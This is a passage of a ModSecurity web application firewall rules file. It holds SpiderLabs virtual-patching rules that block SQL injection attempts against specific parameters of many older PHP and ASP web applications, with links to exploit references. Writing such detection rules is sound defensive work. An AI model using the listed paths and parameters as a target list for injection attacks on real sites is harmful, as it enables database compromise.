UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005389) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Xoops SQL Injection Attempt -- table_broken.php lid UPDATE SecRule REQUEST_LINE "@contains /class/table_broken.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005389,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Xoops SQL Injection Attempt -- table_broken.php lid UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/22399'" SecRule &TX:'/SQL_INJECTION.*ARGS:lid/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Xoops SQL Injection Attempt -- table_broken.php lid UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006491) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Xoops SQL Injection Attempt -- print.php id UPDATE SecRule REQUEST_LINE "@contains /print.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006491,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Xoops SQL Injection Attempt -- print.php id UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3588'" SecRule &TX:'/SQL_INJECTION.*ARGS:id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Xoops SQL Injection Attempt -- print.php id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006218) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Xt-News SQL Injection Attempt -- show_news.php id_news UPDATE SecRule REQUEST_LINE "@contains /show_news.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006218,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Xt-News SQL Injection Attempt -- show_news.php id_news UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21719'" SecRule &TX:'/SQL_INJECTION.*ARGS:id_news/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Xt-News SQL Injection Attempt -- show_news.php id_news UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005614) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Xtreme ASP Photo Gallery SQL Injection Attempt -- displaypic.asp sortorder UPDATE SecRule REQUEST_LINE "@contains /displaypic.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005614,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Xtreme ASP Photo Gallery SQL Injection Attempt -- displaypic.asp sortorder UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21138'" SecRule &TX:'/SQL_INJECTION.*ARGS:sortorder/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Xtreme ASP Photo Gallery SQL Injection Attempt -- displaypic.asp sortorder UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004808) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Mathis Dirksen-Thedens ZephyrSoft Toolbox Address Book Continued (ABC) SQL Injection Attempt -- functions.php id UPDATE SecRule REQUEST_LINE "@contains /functions.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004808,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Mathis Dirksen-Thedens ZephyrSoft Toolbox Address Book Continued (ABC) SQL Injection Attempt -- functions.php id UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/22685'" SecRule &TX:'/SQL_INJECTION.*ARGS:id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Mathis Dirksen-Thedens ZephyrSoft Toolbox Address Book Continued (ABC) SQL Injection Attempt -- functions.php id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005197) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Zindizayn Okul Web Sistemi SQL Injection Attempt -- mezungiris.asp id UPDATE SecRule REQUEST_LINE "@contains /mezungiris.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005197,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Zindizayn Okul Web Sistemi SQL Injection Attempt -- mezungiris.asp id UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/469710/100/0/threaded'" SecRule &TX:'/SQL_INJECTION.*ARGS:id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Zindizayn Okul Web Sistemi SQL Injection Attempt -- mezungiris.asp id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005203) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Zindizayn Okul Web Sistemi SQL Injection Attempt -- mezungiris.asp pass UPDATE SecRule REQUEST_LINE "@contains /mezungiris.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005203,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Zindizayn Okul Web Sistemi SQL Injection Attempt -- mezungiris.asp pass UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/469710/100/0/threaded'" SecRule &TX:'/SQL_INJECTION.*ARGS:pass/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Zindizayn Okul Web Sistemi SQL Injection Attempt -- mezungiris.asp pass UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005209) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Zindizayn Okul Web Sistemi SQL Injection Attempt -- ogretmenkontrol.asp pass UPDATE SecRule REQUEST_LINE "@contains /ogretmenkontrol.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005209,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Zindizayn Okul Web Sistemi SQL Injection Attempt -- ogretmenkontrol.asp pass UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/469710/100/0/threaded'" SecRule &TX:'/SQL_INJECTION.*ARGS:pass/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Zindizayn Okul Web Sistemi SQL Injection Attempt -- ogretmenkontrol.asp pass UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005215) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Zindizayn Okul Web Sistemi SQL Injection Attempt -- ogretmenkontrol.asp id UPDATE SecRule REQUEST_LINE "@contains /ogretmenkontrol.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005215,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Zindizayn Okul Web Sistemi SQL Injection Attempt -- ogretmenkontrol.asp id UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/469710/100/0/threaded'" SecRule &TX:'/SQL_INJECTION.*ARGS:id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Zindizayn Okul Web Sistemi SQL Injection Attempt -- ogretmenkontrol.asp id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2003986) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Zomplog SQL Injection Attempt -- mp3playlist.php speler UPDATE SecRule REQUEST_LINE "@contains /plugins/mp3playlist/mp3playlist.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003986,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Zomplog SQL Injection Attempt -- mp3playlist.php speler UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3955'" SecRule &TX:'/SQL_INJECTION.*ARGS:speler/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Zomplog SQL Injection Attempt -- mp3playlist.php speler UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005984) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS aFAQ SQL Injection Attempt -- faqDsp.asp catcode UPDATE SecRule REQUEST_LINE "@contains /faqDsp.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005984,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS aFAQ SQL Injection Attempt -- faqDsp.asp catcode UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3031'" SecRule &TX:'/SQL_INJECTION.*ARGS:catcode/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS aFAQ SQL Injection Attempt -- faqDsp.asp catcode UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005329) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS bbPress SQL Injection Attempt -- formatting-functions.php UPDATE SecRule REQUEST_LINE "@contains /bb-includes/formatting-functions.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005329,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS bbPress SQL Injection Attempt -- formatting-functions.php UPDATE',tag:'web-application-attack',tag:'cve,CVE-2007-3244'" SecRule QUERY_STRING|REQUEST_BODY "(?i:UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS bbPress SQL Injection Attempt -- formatting-functions.php UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005771) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS bitweaver SQL Injection Attempt -- edition.php tk UPDATE SecRule REQUEST_LINE "@contains /newsletters/edition.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005771,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS bitweaver SQL Injection Attempt -- edition.php tk UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/20996'" SecRule &TX:'/SQL_INJECTION.*ARGS:tk/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS bitweaver SQL Injection Attempt -- edition.php tk UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006176) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS chatwm SQL Injection Attempt -- SelGruFra.asp txtUse UPDATE SecRule REQUEST_LINE "@contains /SelGruFra.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006176,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS chatwm SQL Injection Attempt -- SelGruFra.asp txtUse UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21732'" SecRule &TX:'/SQL_INJECTION.*ARGS:txtUse/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS chatwm SQL Injection Attempt -- SelGruFra.asp txtUse UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006182) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS chatwm SQL Injection Attempt -- SelGruFra.asp txtPas UPDATE SecRule REQUEST_LINE "@contains /SelGruFra.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006182,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS chatwm SQL Injection Attempt -- SelGruFra.asp txtPas UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21732'" SecRule &TX:'/SQL_INJECTION.*ARGS:txtPas/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS chatwm SQL Injection Attempt -- SelGruFra.asp txtPas UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004058) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS cpCommerce SQL Injection Attempt -- category.php id_category UPDATE SecRule REQUEST_LINE "@contains /category.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004058,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS cpCommerce SQL Injection Attempt -- category.php id_category UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3981'" SecRule &TX:'/SQL_INJECTION.*ARGS:id_category/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS cpCommerce SQL Injection Attempt -- category.php id_category UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004106) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS cpCommerce SQL Injection Attempt -- manufacturer.php id_manufacturer UPDATE SecRule REQUEST_LINE "@contains /manufacturer.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004106,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS cpCommerce SQL Injection Attempt -- manufacturer.php id_manufacturer UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/24223'" SecRule &TX:'/SQL_INJECTION.*ARGS:id_manufacturer/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS cpCommerce SQL Injection Attempt -- manufacturer.php id_manufacturer UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005038) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS dB Masters Curium CMS SQL Injection Attempt -- news.php c_id UPDATE SecRule REQUEST_LINE "@contains /news.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005038,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS dB Masters Curium CMS SQL Injection Attempt -- news.php c_id UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3256'" SecRule &TX:'/SQL_INJECTION.*ARGS:c_id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS dB Masters Curium CMS SQL Injection Attempt -- news.php c_id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006956) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS dev4u CMS SQL Injection Attempt -- index.php seite_id UPDATE SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006956,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS dev4u CMS SQL Injection Attempt -- index.php seite_id UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21170'" SecRule &TX:'/SQL_INJECTION.*ARGS:seite_id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS dev4u CMS SQL Injection Attempt -- index.php seite_id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006962) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS dev4u CMS SQL Injection Attempt -- index.php gruppe_id UPDATE SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006962,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS dev4u CMS SQL Injection Attempt -- index.php gruppe_id UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21170'" SecRule &TX:'/SQL_INJECTION.*ARGS:gruppe_id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS dev4u CMS SQL Injection Attempt -- index.php gruppe_id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006968) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS dev4u CMS SQL Injection Attempt -- index.php go_target UPDATE SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006968,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS dev4u CMS SQL Injection Attempt -- index.php go_target UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21170'" SecRule &TX:'/SQL_INJECTION.*ARGS:go_target/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS dev4u CMS SQL Injection Attempt -- index.php go_target UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006620) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS dol storye SQL Injection Attempt -- dettaglio.asp id_doc UPDATE SecRule REQUEST_LINE "@contains /dettaglio.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006620,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS dol storye SQL Injection Attempt -- dettaglio.asp id_doc UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21463'" SecRule &TX:'/SQL_INJECTION.*ARGS:id_doc/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS dol storye SQL Injection Attempt -- dettaglio.asp id_doc UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006626) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS dol storye SQL Injection Attempt -- dettaglio.asp id_aut UPDATE SecRule REQUEST_LINE "@contains /dettaglio.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006626,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS dol storye SQL Injection Attempt -- dettaglio.asp id_aut UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21463'" SecRule &TX:'/SQL_INJECTION.*ARGS:id_aut/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS dol storye SQL Injection Attempt -- dettaglio.asp id_aut UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005930) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS eNdonesia SQL Injection Attempt -- mod.php did UPDATE SecRule REQUEST_LINE "@contains /mod.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005930,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS eNdonesia SQL Injection Attempt -- mod.php did UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3004'" SecRule &TX:'/SQL_INJECTION.*ARGS:did/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS eNdonesia SQL Injection Attempt -- mod.php did UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005936) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS eNdonesia SQL Injection Attempt -- mod.php cid UPDATE SecRule REQUEST_LINE "@contains /mod.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005936,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS eNdonesia SQL Injection Attempt -- mod.php cid UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3004'" SecRule &TX:'/SQL_INJECTION.*ARGS:cid/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS eNdonesia SQL Injection Attempt -- mod.php cid UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2007379) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS fipsGallery SQL Injection Attempt -- index1.asp which UPDATE SecRule REQUEST_LINE "@contains /index1.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2007379,rev:4,msg:'SLR: ET WEB_SPECIFIC_APPS fipsGallery SQL Injection Attempt -- index1.asp which UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/2829'" SecRule &TX:'/SQL_INJECTION.*ARGS:which/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS fipsGallery SQL Injection Attempt -- index1.asp which UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2007385) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS fipsForum SQL Injection Attempt -- default2.asp kat UPDATE SecRule REQUEST_LINE "@contains /default2.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2007385,rev:4,msg:'SLR: ET WEB_SPECIFIC_APPS fipsForum SQL Injection Attempt -- default2.asp kat UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/2830'" SecRule &TX:'/SQL_INJECTION.*ARGS:kat/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS fipsForum SQL Injection Attempt -- default2.asp kat UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2007391) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS fipsCMS SQL Injection Attempt -- index.asp fid UPDATE SecRule REQUEST_LINE "@contains /index.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2007391,rev:4,msg:'SLR: ET WEB_SPECIFIC_APPS fipsCMS SQL Injection Attempt -- index.asp fid UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/2828'" SecRule &TX:'/SQL_INJECTION.*ARGS:fid/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS fipsCMS SQL Injection Attempt -- index.asp fid UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004113) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS gCards SQL Injection Attempt -- getnewsitem.php newsid UPDATE SecRule REQUEST_LINE "@contains /getnewsitem.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004113,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS gCards SQL Injection Attempt -- getnewsitem.php newsid UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3988'" SecRule &TX:'/SQL_INJECTION.*ARGS:newsid/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS gCards SQL Injection Attempt -- getnewsitem.php newsid UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005810) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS iGeneric iG Shop SQL Injection Attempt -- display_review.php id UPDATE SecRule REQUEST_LINE "@contains /display_review.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005810,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS iGeneric iG Shop SQL Injection Attempt -- display_review.php id UPDATE',tag:'web-application-attack',tag:'url,www.frsirt.com/english/advisories/2007/0056'" SecRule &TX:'/SQL_INJECTION.*ARGS:id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS iGeneric iG Shop SQL Injection Attempt -- display_review.php id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005816) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS iGeneric iG Shop SQL Injection Attempt -- display_review.php user_login_cookie UPDATE SecRule REQUEST_LINE "@contains /display_review.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005816,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS iGeneric iG Shop SQL Injection Attempt -- display_review.php user_login_cookie UPDATE',tag:'web-application-attack',tag:'url,www.frsirt.com/english/advisories/2007/0056'" SecRule &TX:'/SQL_INJECTION.*ARGS:user_login_cookie/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS iGeneric iG Shop SQL Injection Attempt -- display_review.php user_login_cookie 